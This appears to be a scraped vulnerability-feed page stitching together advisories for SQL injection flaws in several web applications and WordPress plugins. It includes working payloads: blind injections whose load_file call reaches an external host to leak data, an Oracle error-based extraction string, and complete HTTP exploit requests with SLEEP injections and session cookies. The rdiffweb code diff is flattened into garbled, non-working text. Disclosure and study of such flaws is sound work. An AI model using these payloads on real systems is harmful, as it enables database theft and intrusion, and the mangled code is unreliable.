A vulnerability classified as critical was found in SourceCodester Sanitization Management System 1.0. Affected by this vulnerability is an unknown functionality of the component Admin Login. The manipulation of the argument username/password leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-216739.

CVE-2022-4726

Authentication Bypass by Primary Weakness in GitHub repository ikus060/rdiffweb prior to 2.5.5.

@@ -15,74 +15,91 @@ \# You should have received a copy of the GNU General Public License \# along with this program. If not, see <http://www.gnu.org/licenses/>.  
import logging import sys  
import cherrypy from sqlalchemy import event from sqlalchemy.exc import IntegrityError  
from .\_repo import RepoObject \# noqa from .\_session import DbSession, SessionObject \# noqa from .\_sshkey import SshKey \# noqa from .\_token import Token \# noqa from .\_user import DuplicateSSHKeyError, UserObject \# noqa from .\_user import DuplicateSSHKeyError, UserObject, user\_username\_index \# noqa  
Base \= cherrypy.tools.db.get\_base()  
logger \= logging.getLogger(\_\_name\_\_)  
  
def \_column\_add(connection, column): if \_column\_exists(connection, column): return table\_name \= column.table.fullname column\_name \= column.name column\_type \= column.type.compile(connection.engine.dialect) connection.engine.execute('ALTER TABLE %s ADD COLUMN %s %s' % (table\_name, column\_name, column\_type))  
  
def \_column\_exists(connection, column): table\_name \= column.table.fullname column\_name \= column.name if 'SQLite' in connection.engine.dialect.\_\_class\_\_.\_\_name\_\_: sql \= "SELECT COUNT(\*) FROM pragma\_table\_info('%s') WHERE LOWER(name)=LOWER('%s')" % ( table\_name, column\_name, ) else: sql \= "SELECT COUNT(\*) FROM information\_schema.columns WHERE table\_name='%s' and column\_name='%s'" % ( table\_name, column\_name, ) data \= connection.engine.execute(sql).first() return data\[0\] \>= 1  
  
def \_index\_exists(connection, index\_name): if 'SQLite' in connection.engine.dialect.\_\_class\_\_.\_\_name\_\_: sql \= "SELECT name FROM sqlite\_master WHERE type = 'index' AND name = '%s';" % (index\_name) else: sql \= "SELECT \* FROM pg\_indexes WHERE indexname = '%s'" % (index\_name) return connection.engine.execute(sql).first() is not None  
  
@event.listens\_for(Base.metadata, 'after\_create') def db\_after\_create(target, connection, \*\*kw): """ Called on database creation to update database schema. """  
def exists(column): table\_name \= column.table.fullname column\_name \= column.name if 'SQLite' in connection.engine.dialect.\_\_class\_\_.\_\_name\_\_: sql \= "SELECT COUNT(\*) FROM pragma\_table\_info('%s') WHERE LOWER(name)=LOWER('%s')" % ( table\_name, column\_name, ) else: sql \= "SELECT COUNT(\*) FROM information\_schema.columns WHERE table\_name='%s' and column\_name='%s'" % ( table\_name, column\_name, ) data \= connection.engine.execute(sql).first() return data\[0\] \>= 1  
def add\_column(column): if exists(column): return table\_name \= column.table.fullname column\_name \= column.name column\_type \= column.type.compile(connection.engine.dialect) connection.engine.execute('ALTER TABLE %s ADD COLUMN %s %s' % (table\_name, column\_name, column\_type))  
if getattr(connection, '\_transaction', None): connection.\_transaction.commit()  
\# Add repo's Encoding add\_column(RepoObject.\_\_table\_\_.c.Encoding) add\_column(RepoObject.\_\_table\_\_.c.keepdays) \_column\_add(connection, RepoObject.\_\_table\_\_.c.Encoding) \_column\_add(connection, RepoObject.\_\_table\_\_.c.keepdays)  
\# Create column for roles using "isadmin" column. Keep the \# original column in case we need to revert to previous version. if not exists(UserObject.\_\_table\_\_.c.role): add\_column(UserObject.\_\_table\_\_.c.role) if not \_column\_exists(connection, UserObject.\_\_table\_\_.c.role): \_column\_add(connection, UserObject.\_\_table\_\_.c.role) UserObject.query.filter(UserObject.\_is\_admin \== 1).update({UserObject.role: UserObject.ADMIN\_ROLE})  
\# Add user's fullname column add\_column(UserObject.\_\_table\_\_.c.fullname) \_column\_add(connection, UserObject.\_\_table\_\_.c.fullname)  
\# Add user's mfa column add\_column(UserObject.\_\_table\_\_.c.mfa) \_column\_add(connection, UserObject.\_\_table\_\_.c.mfa)  
\# Re-create session table if Number column is missing if not exists(SessionObject.\_\_table\_\_.c.Number): if not \_column\_exists(connection, SessionObject.\_\_table\_\_.c.Number): SessionObject.\_\_table\_\_.drop() SessionObject.\_\_table\_\_.create()  
if getattr(connection, '\_transaction', None): connection.\_transaction.commit()  
\# Remove preceding and leading slash (/) generated by previous \# versions. Also rename '.' to '' result \= RepoObject.query.all() @@ -101,3 +118,22 @@ def add\_column(column): row.delete() else: prev\_repo \= (row.userid, row.repopath)  
\# Fix username case insensitive unique if not \_index\_exists(connection, 'user\_username\_index'): duplicate\_users \= ( UserObject.query.with\_entities(func.lower(UserObject.username)) .group\_by(func.lower(UserObject.username)) .having(func.count(UserObject.username) \> 1) ).all() try: user\_username\_index.create() except IntegrityError: msg \= ( 'Failure to upgrade your database to make Username case insensitive. ' 'You must downgrade and deleted duplicate Username. ' '%s' % '\\n'.join(\[str(k) for k in duplicate\_users\]), ) logger.error(msg) print(msg, file\=sys.stderr) raise SystemExit(12)

CVE-2022-4722: Make username case-insensitive · ikus060/rdiffweb@d1aaa96

Student Attendance Management System version 1.0 from Erick O. Omundi suffers from multiple remote SQL injection vulnerabilities.

    ## Title: Student-Attendance-Management-System 1.0 from Erick O. Omundi Multiple-SQLi## Author: nu11secur1ty## Date: 12.25.2022## Vendor: https://github.com/rickxy## Software: https://github.com/rickxy/Student-Attendance-Management-System## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System## Description:The `username` parameter appears to be vulnerable to Multiple-SQLinjection attacks.The attacker can retrieve all sensitive information about the users ofthis system and more bad things.## STATUS: CRITICAL Vulnerability[+] Payload:```MySQL---Parameter: username (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: userType=Administrator&username=lBPxXeUT'+(selectload_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''RLIKE (SELECT (CASE WHEN (6217=6217) THEN 0x6c42507858655554+(selectload_file(0x5c5c5c5c6571387234703362397536676e343276333866366361346366336c77396f7866303373716a65382e657269636b5f66726f6d5f416d65726963612e636f6d5c5c6b6877))+''ELSE 0x28 END)) AND 'FUJm'='FUJm&password=q2H!z4n!F1&login=Login    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: userType=Administrator&username=lBPxXeUT'+(selectload_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''AND (SELECT 8687 FROM (SELECT(SLEEP(7)))btHE) AND'XFcq'='XFcq&password=q2H!z4n!F1&login=Login---```## Reproduce:[href]()https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System## Proof and Exploit:[href](https://streamable.com/goy6ka)## Time spent`00:30:00`

Student Attendance Management System 1.0 SQL Injection

A SQL injection issue in a database stored function in TrueConf Server 5.2.0.10225 allows a low-privileged database user to execute arbitrary SQL commands as the database administrator, resulting in execution of arbitrary code.

\[Suggested description\]

An SQL injection issue in a database stored function in TrueConf Server

5.2.0.10225 allows a low-privileged database user to execute arbitrary

SQL commands as the database administrator, resulting in execution of

arbitrary code.

\------------------------------------------

\[Vulnerability Type\]

SQL Injection

\------------------------------------------

\[Vendor of Product\]

TrueConf LLC

\------------------------------------------

\[Affected Product Code Base\]

TrueConf Server - v5.2.0.10225

\------------------------------------------

\[Attack Type\]

Local

\------------------------------------------

\[Impact Code execution\]

true

\------------------------------------------

\[Impact Escalation of Privileges\]

true

\------------------------------------------

\[Attack Vectors\]

Database stored function

\------------------------------------------

\[Has vendor confirmed or acknowledged the vulnerability?\]

true

\------------------------------------------

\[Discoverer\]

Andrey Sitnikov, Sergey Gerasimov, George Noseevich of SolidLab LLC

\------------------------------------------

\[Reference\]

https://trueconf.com

https://trueconf.ru/products/server/changelog.html

https://solidlab.ru/our-news/145-trueconf.html

CVE-2022-46763: public_cve_submissions/CVE-2022-46763.txt at main · sldlb/public_cve_submissions

A SQL injection issue in the web API in TrueConf Server 5.2.0.10225 allows remote unauthenticated attackers to execute arbitrary SQL commands, ultimately leading to remote code execution.

\[Suggested description\]

An SQL injection issue in the web API in TrueConf Server 5.2.0.10225 allows remote

unauthenticated attackers to execute arbitrary SQL commands, ultimately

leading to remote code execution.

\------------------------------------------

\[Vulnerability Type\]

SQL Injection

\------------------------------------------

\[Vendor of Product\]

TrueConf LLC

\------------------------------------------

\[Affected Product Code Base\]

TrueConf Server - v5.2.0.10225

\------------------------------------------

\[Affected Component\]

Web API

\------------------------------------------

\[Attack Type\]

Remote

\------------------------------------------

\[Impact Code execution\]

true

\------------------------------------------

\[Impact Escalation of Privileges\]

true

\------------------------------------------

\[Has vendor confirmed or acknowledged the vulnerability?\]

true

\------------------------------------------

\[Discoverer\]

Andrey Sitnikov, Sergey Gerasimov, George Noseevich of SolidLab LLC

\------------------------------------------

\[Reference\]

https://trueconf.com

https://trueconf.ru/products/server/changelog.html

https://solidlab.ru/our-news/145-trueconf.html

CVE-2022-46764: public_cve_submissions/CVE-2022-46764.txt at main · sldlb/public_cve_submissions

Shilpi CAPExWeb 1.1 allows SQL injection via a servlet/capexweb.cap_sendMail GET request.

**Description**

The GET request parameters in servlet/capexweb.cap\_sendMail are vulnerable to SQL Injection. An unauthenticated user can take over the database of the application.

**Proof of concept: (POC)**

The following vulnerability was tested on CAPExWeb version 1.1 Product.

1.  Visit the /capexweb/capexweb URI on the server where the capexweb client is installed.
    

_**Figure-1:** Default login page of the application._

1.  Now, fill the login form with the wrong details and submit them.
    

_**Figure-2:** Login form with invalid credentials._

_**Figure-3:** Response shows the credentials are invalid._

2.  From the error response, click on the “Forgot My User id or Password” link. 
    

Note: We cannot navigate to the capforgotpassword.jsp directly, as the application takes the user id from the previously submitted request.

_**Figure-4:** Response shows user-id as null if we navigate to capforgotpassword.jsp directly._

_**Figure-5:** Forgot password page with user-id value submitted in the login page. Now, click on the send request button._

3.  The browser sends the following request to the server.
    

_**Figure-6:** Forgot password request_

_**Figure-7:** Response from the server for invalid user id._

_**Figure-8:** Replay of forgot password page with user-id value containing a single quote returns ORA string not properly terminated error message from the database._

_**Figure-9:** Replay of forgot password page with user-id value containing two quotes returns valid error message from the application._

_**Figure-10:** Replay of forgot password page with user-id value contains comments to truncate the query after user-id returns missing right parenthesis from the database server._

_**Figure-11:** Replay of forgot password page with user-id value contains a single quote and right parenthesis returns quoted string not properly terminated error message from the database server._

_**Figure-12:** Replay of forgot password page with user-id value contains a single quote, right parenthesis, and comment returns missing right parenthesis error message from the database server._

**Note:** After analyzing the responses for different payloads, the payload needs two right parentheses to work.

_**Figure-13:** Replay of forgot password page with user-id value contains a single quote, two right parentheses, and comment returns a valid error message from the application._

**Note:** The proper execution of functionality sends an email or SMS to the user. In production servers, checking this issue may impact all the users. As we do not have a valid user id, trying for always real conditions impacts all the users in the application. So, to minimize the impact on one user, use the ROWNUM condition.

_**Figure-14:** Request with ROWNUM condition as part of the payload._

_**Figure-15:**  User id value with always true condition and ROWNUM condition does not show invalid user id or pan._

_**Figure-16:** The payload XORXX’)) or%201=ctxsys.drithsx.sn (1, (select%20sys.stragg(distinct%20banner)%20from%20v$version))-- in request to retrieve the data from the database in error information._

_**Figure-17:** The available databases in the Oracle database server._

**Impact**

A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.

**Remediations**

Use parameterized queries when dealing with SQL queries that contain user input. Parameterized queries allow the database to understand which parts of the SQL query should be considered as user input, therefore solving SQL injection.

**Timeline**

 **July 01, 2020** - Discovered in our research lab

 **July 17, 2020** \- Followed up with the Vendor

 **July 29, 2020** - Followed up with the Vendor

 **October 7, 2020** -  Informed CERT-in about the vulnerability

 **November 27, 2020** - CERT-in confirmed the vulnerability fix

**Discovered by**

Cyber Security Works Pvt. Ltd.

CVE-2020-24600: 2020-24600 - SQL Injection in CAPExWeb

The Contest Gallery Pro WordPress plugin before 19.1.5 does not escape the wp_user_id GET parameter before concatenating it to an SQL query in management-show-user.php. This may allow malicious users with at administrator privileges (i.e. on multisite WordPress configurations) to leak sensitive information from the site's database.

CVE-2022-4154

The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the upload[] POST parameter before concatenating it to an SQL query in get-data-create-upload-v10.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.

/

contest-gallery 19.1.5 (7/15) WordPress plug-in SQL injection

**contest-gallery 19.1.5 (7/15) WordPress plug-in SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 05 2022

Affected Software

contest-gallery

Affected Software Type

WordPress plugin

Version

19.1.5

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4153

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Kunal Sharma, Daniel Krohmer

Reporter Contact

k\_sharma19@informatik.uni-kl.de

Link to Affected Software

https://wordpress.org/plugins/contest-gallery/

Link to Vulnerability DB

https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4153

**Vulnerability Description**

The upload[] MULTIPART POST query parameter in contest-gallery 19.1.5 is vulnerable to SQL Injection. An attacker with role of Author or above may abuse the _Save form_ functionality in get-data-create-upload-v10.php. This leads to a threat actor crafting multiple malicious POST requests.

**Exploitation Guide**

Create a _New Gallery_, if no gallery was created before.

Change the _Gallery name_.

Click on Edit gallery.

Click Edit upload form.

Click on Save form.

Clicking Save form triggers the vulnerable request.

The request needs to be modified by replacing MULTIPART POST parameter upload[1][type] value from bh to url . Here upload[] is the vulnerable query parameter.

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of upload[] at line 251 in ./v10/v10-admin/upload/get-data-create-upload-v10.php.

At line 596 in ./v10/v10-admin/upload/get-data-create-upload-v10.php the database query call on $id leads to SQL Injection.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below:

    POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&option_id=1&define_upload=true HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------2697798261719864473183552564
    Content-Length: 1215
    Origin: http://localhost:8080
    Connection: close
    Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7Ce93774011f8915e8d1b69955e8c50a905c9040c9c17efcca7b42f24fb32f43e2; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7C2bc19f40221c8d9c3d9219517701a229fe9080215045fe6a050c6d9b594282b3; wp-settings-time-5=1668359977
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="_wpnonce"
    
    07bde4fc61
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="_wp_http_referer"
    
    /wp-admin/admin-ajax.php?page=contest-gallery%2Findex.php&option_id=1&define_upload=true
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="option_id"
    
    1
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="upload[1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)][type]"
    
    url
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="upload[1][order]"
    
    4
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="actualID[]"
    
    1
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="action"
    
    post_contest_gallery_action_ajax
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="cgBackendHash"
    
    e12e8782da8ac6c4f1725d81a9811524
    -----------------------------2697798261719864473183552564--

CVE-2022-4153: Security Bulletin

The IWS WordPress plugin through 1.0 does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.

CVE-2022-4117

The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the option_id GET parameter before concatenating it to an SQL query in export-images-data.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.

**contest-gallery 19.1.4.1 (2/15) WordPress plug-in SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 05 2022

Affected Software

contest-gallery

Affected Software Type

WordPress plugin

Version

19.1.4.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4151

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Kunal Sharma, Daniel Krohmer

Reporter Contact

k\_sharma19@informatik.uni-kl.de

Link to Affected Software

https://wordpress.org/plugins/contest-gallery/

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4151

**Vulnerability Description**

The option_id GET query parameter in contest-gallery 19.1.4.1 is vulnerable to SQL Injection. An authenticated attacker may abuse the _Export all fields and total rating_ functionality in cg_images_data_csv_export function inside export-images-data.php. This leads to a threat actor crafting a malicious GET request.

**Exploitation Guide**

Login as admin user. This attack requires at least admin privileges.

Create a _New Gallery_, if no gallery was created before.

Change the _Gallery name_.

Click on Edit gallery.

Click Export all fields and total rating

Clicking Export all fields and total rating triggers the vulnerable request, the option_id GET parameter is the vulnerable query parameter.

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of user_id at line 21 in ./v10/v10-admin/export/export-images-data.php.

At lines 38-43 in ./v10/v10-admin/export/export-images-data.php the database query call on $GalleryID leads to SQL Injection.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below:

    POST /wp-admin/admin.php?page=contest-gallery/index.php&option_id=8+AND+(SELECT+7394+FROM+(SELECT(SLEEP(3*2)))UrUZ)&edit_gallery=true HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 41
    Origin: http://localhost:8080
    Connection: close
    Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668473199%7CmFhoaVtvxA8yev5wAqpggBLhRsiY0PfpEBma5kPRq8T%7Cb131f9f1d3b9498930de4f620580d0214b838d43b71fdedf92328ca0032bbcdb; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668473199%7CmFhoaVtvxA8yev5wAqpggBLhRsiY0PfpEBma5kPRq8T%7Cf386bbd185ec8df8d8f91a0b8e8c5431b81e06b292212515a24d8c73b7d47d52; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668300399
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    contest_gal1ery_post_create_data_csv=true

Tag

#sql